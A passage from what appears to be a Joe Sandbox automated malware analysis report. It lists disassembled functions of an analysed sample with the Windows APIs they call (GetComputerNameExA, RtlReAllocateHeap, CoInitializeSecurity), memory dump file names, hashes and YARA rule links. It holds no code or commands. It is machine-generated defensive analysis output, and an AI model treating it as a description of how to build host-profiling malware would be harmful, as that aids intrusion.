                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469497351.00000000011D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469541734.00000000011D9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469578081.00000000011DC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469626117.00000000011DD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469674067.00000000011DE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469706807.00000000011E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469758740.00000000011E5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469822175.00000000011F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469862708.0000000001206000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469894994.0000000001207000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469947635.0000000001208000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469980819.000000000120D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470030286.000000000120E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470079606.0000000001212000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470191722.0000000001219000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470228437.000000000121B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470334932.0000000001229000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470389520.000000000122C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470701406.000000000122D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470752592.000000000122F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470830453.0000000001236000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470883637.0000000001238000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470920275.0000000001239000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471024688.000000000123E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471091413.000000000123F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471141430.0000000001244000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471232673.000000000124C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471273399.000000000124D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471377126.0000000001269000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471454866.000000000126C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471510195.000000000127C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000127E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000128A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471705587.00000000012B1000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471742405.00000000012B2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B3000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471944426.00000000012C7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_fd0000_7620ab885d.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ComputerName
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3545744682-0
                                                                                                                                                                                                                              • Opcode ID: 0d45732c19df85ae290c6b5c9d0a42733ca27775135e10eb474f51be5691be83
                                                                                                                                                                                                                              • Instruction ID: 14a283703e6b715bf27e156315997d8a48538b6ffd4f29a79c9526eaaa0f53cf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d45732c19df85ae290c6b5c9d0a42733ca27775135e10eb474f51be5691be83
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6C21D3715047918FD7268F28C460732BBE2BF5B300F2886CDD5D38B796CA78A841E761
                                                                                                                                                                                                                              Function 00FFDC76 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 00FFDD03
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2468779789.0000000000FD1000.00000040.00000001.01000000.00000009.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468726882.0000000000FD0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468779789.0000000001015000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468921125.0000000001025000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468955080.0000000001031000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469124683.0000000001187000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469173851.0000000001189000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.000000000119F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.00000000011AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469303471.00000000011B0000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469354998.00000000011B4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469390031.00000000011BF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469439536.00000000011C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469497351.00000000011D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469541734.00000000011D9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469578081.00000000011DC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469626117.00000000011DD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469674067.00000000011DE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469706807.00000000011E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469758740.00000000011E5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469822175.00000000011F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469862708.0000000001206000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469894994.0000000001207000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469947635.0000000001208000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469980819.000000000120D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470030286.000000000120E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470079606.0000000001212000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470191722.0000000001219000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470228437.000000000121B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470334932.0000000001229000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470389520.000000000122C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470701406.000000000122D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470752592.000000000122F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470830453.0000000001236000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470883637.0000000001238000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470920275.0000000001239000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471024688.000000000123E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471091413.000000000123F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471141430.0000000001244000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471232673.000000000124C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471273399.000000000124D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471377126.0000000001269000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471454866.000000000126C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471510195.000000000127C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000127E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000128A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471705587.00000000012B1000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471742405.00000000012B2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B3000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471944426.00000000012C7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_fd0000_7620ab885d.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ComputerName
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3545744682-0
                                                                                                                                                                                                                              • Opcode ID: 8043717b1324c0b316f5ad5089a066abc7fc8b79433315153574c7b3132601ba
                                                                                                                                                                                                                              • Instruction ID: 5472873ef6ff0c1b5a5eb1cec4f31a928997d2fe00c417b7189827f64fd813d3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8043717b1324c0b316f5ad5089a066abc7fc8b79433315153574c7b3132601ba
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E11E7B06447918BD7258F24C460732BBE2BF4A300B1CC69DD493CB386CA38D441D761
                                                                                                                                                                                                                              Function 0100E0A0 Relevance: 1.5, APIs: 1, Instructions: 31memoryCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlReAllocateHeap.NTDLL(?,00000000), ref: 0100E0E0
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2468779789.0000000000FD1000.00000040.00000001.01000000.00000009.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468726882.0000000000FD0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468779789.0000000001015000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468921125.0000000001025000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468955080.0000000001031000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469124683.0000000001187000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469173851.0000000001189000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.000000000119F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.00000000011AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469303471.00000000011B0000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469354998.00000000011B4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469390031.00000000011BF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469439536.00000000011C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469497351.00000000011D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469541734.00000000011D9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469578081.00000000011DC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469626117.00000000011DD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469674067.00000000011DE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469706807.00000000011E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469758740.00000000011E5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469822175.00000000011F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469862708.0000000001206000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469894994.0000000001207000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469947635.0000000001208000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469980819.000000000120D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470030286.000000000120E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470079606.0000000001212000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470191722.0000000001219000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470228437.000000000121B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470334932.0000000001229000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470389520.000000000122C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470701406.000000000122D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470752592.000000000122F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470830453.0000000001236000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470883637.0000000001238000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470920275.0000000001239000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471024688.000000000123E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471091413.000000000123F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471141430.0000000001244000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471232673.000000000124C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471273399.000000000124D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471377126.0000000001269000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471454866.000000000126C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471510195.000000000127C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000127E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000128A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471705587.00000000012B1000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471742405.00000000012B2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B3000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471944426.00000000012C7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_fd0000_7620ab885d.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                              • Opcode ID: a630bcc299ba36480db4de643ded21d4f264484ae3a0c8c58060e52ef8f18e31
                                                                                                                                                                                                                              • Instruction ID: acc009d9d8319ba5459382fa9754cf494029abdae30f5351510d92fe820bbd6d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a630bcc299ba36480db4de643ded21d4f264484ae3a0c8c58060e52ef8f18e31
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 04F0EC32918113FBF3315F38FD04A5B3664EFD6615F060474F48056194DB3ED8568691
                                                                                                                                                                                                                              Function 00FDEC77 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00FDECA2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2468779789.0000000000FD1000.00000040.00000001.01000000.00000009.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468726882.0000000000FD0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468779789.0000000001015000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468921125.0000000001025000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468955080.0000000001031000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469124683.0000000001187000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469173851.0000000001189000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.000000000119F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.00000000011AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469303471.00000000011B0000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469354998.00000000011B4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469390031.00000000011BF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469439536.00000000011C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469497351.00000000011D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469541734.00000000011D9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469578081.00000000011DC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469626117.00000000011DD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469674067.00000000011DE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469706807.00000000011E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469758740.00000000011E5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469822175.00000000011F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469862708.0000000001206000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469894994.0000000001207000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469947635.0000000001208000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469980819.000000000120D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470030286.000000000120E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470079606.0000000001212000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470191722.0000000001219000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470228437.000000000121B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470334932.0000000001229000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470389520.000000000122C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470701406.000000000122D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470752592.000000000122F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470830453.0000000001236000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470883637.0000000001238000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470920275.0000000001239000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471024688.000000000123E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471091413.000000000123F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471141430.0000000001244000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471232673.000000000124C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471273399.000000000124D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471377126.0000000001269000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471454866.000000000126C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471510195.000000000127C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000127E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000128A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471705587.00000000012B1000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471742405.00000000012B2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B3000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471944426.00000000012C7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_fd0000_7620ab885d.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InitializeSecurity
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 640775948-0
                                                                                                                                                                                                                              • Opcode ID: aade4340f78c63bc9c61dd86172fce5872d7c47f1eb9870ac12af63db7667dc1
                                                                                                                                                                                                                              • Instruction ID: cc23f96a4d658c5008e560483a2533e804701258187d8bfb7daee6b63ace664a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aade4340f78c63bc9c61dd86172fce5872d7c47f1eb9870ac12af63db7667dc1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 98E092383EA3427AF67982549CA3F29211A6B83F25E30AB04B3713E3C8CAD83101450C
                                                                                                                                                                                                                              Function 01000B2B Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
